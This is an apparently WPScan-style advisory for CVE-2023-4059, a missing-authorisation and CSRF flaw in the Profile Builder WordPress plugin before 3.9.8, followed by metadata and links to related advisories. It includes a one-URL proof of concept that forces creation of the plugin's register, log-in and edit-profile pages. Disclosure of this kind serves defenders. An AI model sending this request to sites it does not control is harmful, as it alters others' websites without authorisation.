Profile Builder < 3.9.8 – Unauthenticated Plugin's Pages Creation | CVE 2023-4059 | Plugin Vulnerabilities

Description

The plugin lacks authorisation and CSRF in its page creation function which allows unauthenticated users to create the register, log-in and edit-profile pages from the plugin on the blog

Proof of Concept

1. Access the URL: https://example.com/wp-admin/admin-post.php?page=profile-builder-basic-info&wppb_create_pages=true&wppb_force_create_pages=true 
2. As a logged in user, see that the pages `/register`, `/log-in`, and `/edit-profile` have been created.

Affects Plugins

profile-builder

Fixed in 3.9.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Mesh3l_911

Submitter

Mesh3l_911

Submitter website

https://mesh3l911.github.io/tabs/about/

Submitter twitter

Verified

Yes

WPVDB ID

fc719d12-2f58-4d1f-b696-0f937e706842

Timeline

Publicly Published

2023-08-09 (about 2 years ago)

Added

2023-08-09 (about 2 years ago)

Last Updated

2023-08-09 (about 2 years ago)

Other

Published

Title

Published

2025-03-27

Title

WpEvently < 4.3.0 - Missing Authorization

Published

2023-06-26

Title

Subscribe2 – Form, Email Subscribers & Newsletters < 10.41 - Missing Access Controls

Published

2025-11-17

Title

Download Panel <= 1.3.3 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Settings Modification

Published

2024-08-12

Title

Clearfy Cache < 2.2.5 - Missing Authorization

Published

2024-12-11

Title

Web3 Cryptocurrency Payments by DePay for WooCommerce < 2.12.18 - Missing Authorization to Information Exposure